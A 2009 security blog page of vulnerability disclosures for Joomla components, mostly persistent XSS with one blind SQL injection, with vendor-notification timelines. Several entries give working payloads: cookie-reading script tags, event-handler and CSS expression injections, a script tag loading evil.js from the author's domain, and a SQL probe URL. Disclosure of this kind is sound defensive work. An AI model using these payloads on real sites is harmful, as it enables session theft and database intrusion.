jeffchannell.com

EasyBook 2.0.0rc4 Multiple XSS Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component EasyBook 2.0.0rc4 suffers from multiple persistent XSS vulnerabilities. One seems fairly critical, while the others would take some incredible creativity to actively exploit.

  1. BBCode XSS

    Settings:

    • Allow BBCode - on (default)
    • Allow Pictures - on (not default)
    [img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
  2. Website URL XSS

    Settings:

    • Show web site field: Show (default)
    foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;

    Requires minimal user interaction

  3. Skype/Yahoo Username XSS

    Very narrow scope, as entries are truncated. XSS still technically possible. Requires user interaction.

    ' onclick="alert('XSS')"
  4. AIM/MSN Username XSS

    Again, narrow scope. See 3.

    " onclick="alert('xss')"

    ICQ username is similar, but scope seems too narrow to exploit.

Timeline

ccBoard 1.1-RC XSS Vulnerability

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component ccBoard 1.1-RC suffers from a Cross Site Scripting vulnerability if certain conditions are met. The forum must be set up to use the internal HTML editor and not bbCode. This is the default setting upon install.

To execute, simply post a new message. Either toggle the editor to 'off' or use the HTML Source editing button, insert your JavaScript, and submit!

<script>alert('xss');</script>

The editor was even nice enough to make my XSS injection pretty upon saving:

<script type="text/javascript">// <![CDATA[
alert('xss');
// ]]></script>

F!BB 1.5.96 RC Multiple Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component F!BB 1.5.96 RC suffers from multiple persistent XSS vulnerabilities, as well SQL Injection in its user search feature.

  1. ICQ, MSN Profile Fields XSS

    The MSN field will be rendered in the page twice.
    "><script>alert(document.cookie)</script><b f="
  2. AIM Profile Field XSS

    This vulnerability has a limited number of characters, but this will inject script:
    "><script src=//jeffchannell.com/evil.js></script
    NOTE: Skype, Gtalk, website fields are also vulnerable, though the window for injection is even smaller!
  3. Blind SQL Injection

    REQUIRES: magic_quotes_gpc OFF
    index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.

Timeline

Rapid Forum XSS Vulnerability

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component Rapid Forum suffers from a persistent XSS vulnerability.

This vulnerability is pretty easy to exploit, as Rapid Forum does absolutely no validation or encoding whatsoever.
<script>alert(document.cookie)</script>

Timeline

Simplest Forum BBCode Plugin 1.0.0 Beta 2 XSS Vulnerability

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Simplest Forum BBCode Plugin 1.0.0 Beta 2 for Joomla suffers from a persistent XSS vulnerability that allows arbitrary injections of CSS rules.

[color=#FF0000;font-size:100px]XSS[/color]

Timeline

Testimonial Ku 2.0 Admin Panel Persistent XSS

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component Testimonial Ku 2.0 is vulnerable to persistent XSS in the administrator panel. A malicious user can submit a testimonial containing <script> tags with absolutely no quotes and inject that script into the administrator panel through any of the available inputs except "email".

Fake Submission<script>alert(document.cookie)</script>

Now, when an administrator views the latest submissions, the script will execute with that admin's permissions.

Timeline

MS Comment 0.8.0b Multiple Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

MS Comment 0.8.0b for Joomla, a commenting plugin, suffers from an multiple vulnerabilities.

  1. Captcha Cracking

    The submission uses AJAX and fails to reset the captcha after a submission. Read once, write many.
  2. Website Input XSS

    The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.
    " onmouseover="alert(String.fromCharCode(88,83,83))
    " style="color:expression(alert(String.fromCharCode(88,83,83)))

    Timeline

    • Vulnerabilities Discovered: 31 July 2009
    • Vendor Notified: 31 July 2009
    • Vendor Response: ... 2009
    • Update Available: ... 2009
    • Disclosure: 17 September 2009

!JoomlaComment 4.0 beta1 Multiple XSS Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

!JoomlaComment 4.0 beta1, a commenting plugin, suffers from multiple XSS vulnerabilities.

  1. Website Input XSS

    The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.
    ' onmouseover='alert(String.fromCharCode(88,83,83))
    ' style='color:expression(alert(String.fromCharCode(88,83,83)))
  2. [img] BBCode Tag XSS

    [img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
  3. [url] BBCode Tag XSS

    [url=http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))]XSS[/url]
  4. [size] BBCode Tag XSS

    [size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]
    This XSS vulnerability executes in the administrator area as well.
  5. [color] BBCode Tag XSS

    [color=red;font-size:expression(alert(String.fromCharCode(88,83,83)))]XSS[/color]
    This XSS vulnerability executes in the administrator area as well.

Timeline

Change Component Heading on SOBI2

Posted in Joomla!
2009-09-09 17:20:35 +0000 UTC

I was in need of a fix for the Joomla! component SOBI2, as a client wanted the title to reflect the current category and listing, instead of always having the name of the directory. After searching the web, I found an older post on the Sigsiu forums dealing with this. After rewriting a portion to reflect changes in SOBI2 since this was posted and applying this fix, however, I found that my copy of IE6 was throwing a very strange error: 80004004.

Joomla Reset Password Insecurity

Posted in Joomla!
2009-08-31 04:04:16 +0000 UTC

The methods used by the Joomla core to validate tokens generated by a password reset request are a weak spot in the security of the system when coupled with the introduction of insecure third party components. A fundamental change in this handling could assist in hardening a typical Joomla web site. I am proposing an added security measure to the Joomla core in order to mitigate possible intrusion due to vulnerabilities in third party components.